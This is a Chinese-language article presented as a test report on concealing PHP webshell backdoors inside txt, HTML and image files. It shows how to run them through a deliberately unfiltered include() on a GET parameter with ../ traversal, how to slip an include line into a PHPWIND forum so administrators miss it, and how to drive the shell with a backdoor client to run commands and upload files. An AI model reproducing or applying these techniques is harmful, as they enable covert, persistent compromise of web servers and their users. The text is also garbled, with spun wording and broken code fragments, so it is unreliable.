PHP后门的隐藏技巧测试报告 |
近期众多朋友都在问我是不是能把我那一句话木马 潜藏到HTML或图片里,其实把一句话木马插入到PHP文件中就已经很 隐秘了,假如说硬是要放到 HTML文件或图片里,就接着往下看这篇的篇测试报告吧 。要晓得假如光把PHP语句放到图片里是无论如何也不能执行的,由于PHP只解析 扩大名为php的文件 。所以说要能使 潜藏在图片里的PHP语句执行 。我们就的借助PHP中的调用函数 :include 、require 等 。 我们还记得前些日子把木马 潜藏到图片的文章吧 。也便是在PHP文件里用include("x.gif")这样的语句来调用 潜藏在图片的木马语句 。ASP中语句也 类似 。看似十分 隐秘但直接调用图片对略微懂点PHP的人就不难发现可疑之处 。由于URL 里用GET 模式很难传递参数,这就使得插入木马的性能得不到 施展 。 Include 函数在PHP中 使用的 比较频繁,所以引起的安全问题也 着实太多,例如PHPWIND1.36的 漏洞便是由于include后面的变量没做过滤引起的 。由此我们就 可以 构造 类似的语句来插入到PHP文件中 。 而后把木马 潜藏到图片或HTML文件里, 可以说 隐秘性就更高了 。如在PHPWIND论坛里插入下面的语句:<‘’?@include includ/.$PHPWIND_ROOT;? > 普通治理员是 无奈看出来的 。 有了include 函数来辅助帮忙我们就 可以把PHP木马 潜藏到 诸如 txt、html和图片文件等众多类型的文件里来了 。由于txt、html和图片文件这三 品种型的文件最无论在论坛还是文章系统里是最为常见的了,下面我们就 顺次来做测试 。 首先 构建一PHP文件test.php 文件内容为: $test=$_GET['test']; @include 'test/'.$test; ?> Txt文件普通都是 注明文件,所以我们把一句话木马放到目录的 注明文件里就OK了 。 随便 构建一个TXT文件t.txt 。我们把一句话木马粘贴到 t.txt文件里 。 而后 拜访 http://localhost/test/test.php?test=../t.txt 假如你看到t.txt的内容就 证实Ok了, 而后把在lanker微型PHP后门客户端 木马地址添入 http://localhost/test/test.php?test=../t.txt 密码里添入cmd就 可以了,执行返回的 后果都 可以看到 。 关于HTML的文件,普通都为模版文件 。为了使插入到HTML的文件的木马能被调用执行并且不被显示出来,我们 可以在HTML里加入一个 潜藏属性的文本框 ,如: 而后 使用 步骤同上 。执行的返回 后果普通都 可以查看源文件看到 。 如 使用查看本程序目录 性能 。查看源文件内容为 我 可以得到目录为 C:\Uniserver2_7s\www\test 。 下面我们说说图片文件,要说最为毒的一招莫过于把木马 潜藏到图片里 。我们 可以直接对一个图片进行编辑,把插入到图片末尾 经测试普通都不会对图片造成影响 。 而后同样 步骤客户端木马地址添入 我们查看PHP环境变量 返回的是 后果是原图片 。 这里可能要和我们 设想的 后果有些差距了,其实命令已经运行了,只不过返回的 后果看不到而已,由于这是真正的GIF文件,所以是不会显示返回 后果的,为了 证实是不是真的执行了命令我们执行上传文件命令 。果不出所料,文件已经 顺利上传到服务器上 。这样伪造的 长处是 隐秘性好 。缺陷也自然不用说了是没回显 。假如你想看到返回的 后果,那就拿出记事本伪造一个假的图片文件吧 。 到这里就 根本测试完了, 怎么 隐秘PHP后门就看你自己的 取舍了 。行文仓促,如有不妥之处,请指出! |